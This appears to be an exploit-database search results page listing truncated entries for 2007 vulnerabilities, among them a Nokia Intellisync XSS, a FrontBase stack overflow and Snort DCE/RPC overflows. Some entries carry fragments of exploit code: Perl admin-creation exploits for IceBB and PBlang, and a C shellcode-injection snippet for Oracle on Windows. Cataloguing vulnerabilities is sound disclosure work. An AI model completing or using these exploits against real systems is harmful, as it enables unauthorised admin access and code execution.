5975 matches found
CVE-2007-2592
Multiple cross-site scripting (XSS) vulnerabilities in Nokia Intellisync Mobile Suite 6.4.31.2, 6.6.0.107, and 6.6.2.2, possibly involving Novell Groupwise Mobile Server and Nokia Intellisync Wireless Email Express, allow remote attackers to inject arbitrary web script or HTML via the (1) username...
Mandrake Linux Security Advisory : php (MDKSA-2007:102)
A heap buffer overflow flaw was found in the xmlrpc extension for PHP. A script that implements an XML-RPC server using this extension could allow a remote attacker to execute arbitrary code as the apache user. This flaw does not, however, affect PHP applications using the pure-PHP XMLRPC class...
MyBlog 0.9.8 - 'Settings.php' Authentication Bypass
source: https://www.securityfocus.com/bid/23521/info MyBlog is prone to an authentication-bypass vulnerability. Attackers can exploit this issue to bypass the authentication mechanism and then access or overwrite files with arbitrary PHP script code. Script code added to certain files are later...
IceBB 1.0-rc5 - Remote Create Admin
!/usr/bin/perl IceBB 1.0-rc5 Remote Create Admin Exploit 1. register a user 2. run this exploit with this usage : $perl xpl.pl host&path uname pass 3. login with admin access : - magicquotesgpc = Off Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net use LWP::UserAgent; use HTTP::Cookies;...
PBlang <= 4.66z Remote Create Admin Exploit
No description provided by source. !/usr/bin/perl PBlang 4.66z Create Admin Exploit this exploit register a user with admin access Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net use IO::Socket; use LWP::UserAgent; use HTTP::Cookies; $host = $ARGV0; $uname = $ARGV1; $passwd = $ARGV2; $url...
PBlang <= 4.66z Remote Create Admin Exploit
Exploit for unknown platform in category web applications PBlang new or die; $cookiejar = HTTP::Cookies-new; $xpl-cookiejar $cookiejar ; register $reg = $xpl-post$url.'register.php?reg=2', Content = "user" = $uname, "pass" = $passwd, "pass2" = $passwd,...
PBlang 4.66z - Remote Create Admin
!/usr/bin/perl PBlang 4.66z Create Admin Exploit this exploit register a user with admin access Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net use IO::Socket; use LWP::UserAgent; use HTTP::Cookies; $host = $ARGV0; $uname = $ARGV1; $passwd = $ARGV2; $url = "http://".$host; print q PBLANG...
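FrontBase Relational Database Server create procedure Remote Stack Overflow Vulnerability
FrontBase is an enterprise-grade relational database server. FrontBase has a stack overflow vulnerability when creating stored procedures, which allows an attacker to gain NT AUTHORITY\SYSTEM or root privileges. If an attacker passes an overly long argument in a "create procedure" SQL statement, the overflow is triggered and memory is corrupted. For example, the following SQL statement: create procedure "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...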
CVE-2007-1511
Buffer overflow in FrontBase Relational Database Server 4.2.7 and earlier allows remote authenticated users, with privileges for creating a stored procedure, to execute arbitrary code via a CREATE PROCEDURE request with a long procedure name...
oracle 10g (PROCESS_DUP_HANDLE) Local Privilege Elevation (win32)
include windows. h include stdio. h BOOL InjectShellcodeDWORD oldEIP,CHAR oSID HMODULE hKernel; FARPROC pCreateProc; LPSTR sCommand="cmd.exe"; DWORD dwStrLen; CHAR buff1 0 0; dwStrLen=strlensCommand; hKernel=LoadLibrary"Kernel32.dll"; pCreateProc=GetProcAddresshKernel,"CreateProcessA"; strcpybuff...
Microsoft Windows - DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption
!/usr/bin/python MS Windows DCE-RPC svcctl ChangeServiceConfig2A 0day Memory Corruption PoC Exploit Bug discovered by Krystian Kloskowski h07 Tested on Windows 2000 SP4 Polish all patches Requires.. - Impacket : http://oss.coresecurity.com/projects/impacket.html - PyCrypto :...
PT-2007-1419 · Oracle · Oracle Database Server
Name of the Vulnerable Software and Affected Versions: Oracle Database Server affected versions not specified Description: The issue allows remote authenticated users to read and modify arbitrary files via full filepaths to utl_file functions such as utl_file.put_line and utl_file.get_line when u...
Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow
!/usr/bin/python Snort DCE/RPC Preprocessor Buffer Overflow Command Execution Version Author: Trirat Puttaraksa http://sf-freedom.blogspot.com For educational purpose only This exploit call calc.exe on Windows XP SP2 + Snort 2.6.1 Note: this exploit use Scapy http://www.secdev.org/projects/scapy/...
Snort 2.6.1 - DCERPC Preprocessor Remote Buffer Overflow
Snort 2.6.1 - DCERPC Preprocessor Remote Buffer Overflow !/usr/bin/python Snort DCE/RPC Preprocessor Buffer Overflow Command Execution Version Author: Trirat Puttaraksa http://sf-freedom.blogspot.com For educational purpose only This exploit call calc.exe on Windows XP SP2 + Snort 2.6.1 Note: thi...
Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit
Exploit for multiple platform in category dos / poc Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit !/usr/bin/python Snort DCE/RPC Preprocess...
Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow (Denial of Service) (PoC)
!/usr/bin/python Snort DCE/RPC Preprocessor Buffer Overflow DoS Author: Trirat Puttaraksa http://sf-freedom.blogspot.com For educational purpose only This exploit just crash Snort 2.6.1 on Fedora Core 4. However, Code Execution may be possible, but I have no time to make it : I will post the...
CVE-2007-0507
SQL injection vulnerability in the Acidfree module for Drupal before 4.6.x-1.0, and before 4.7.x-1.0 in the 4.7 series, allows remote authenticated users with "create acidfree albums" privileges to execute arbitrary SQL commands via node titles...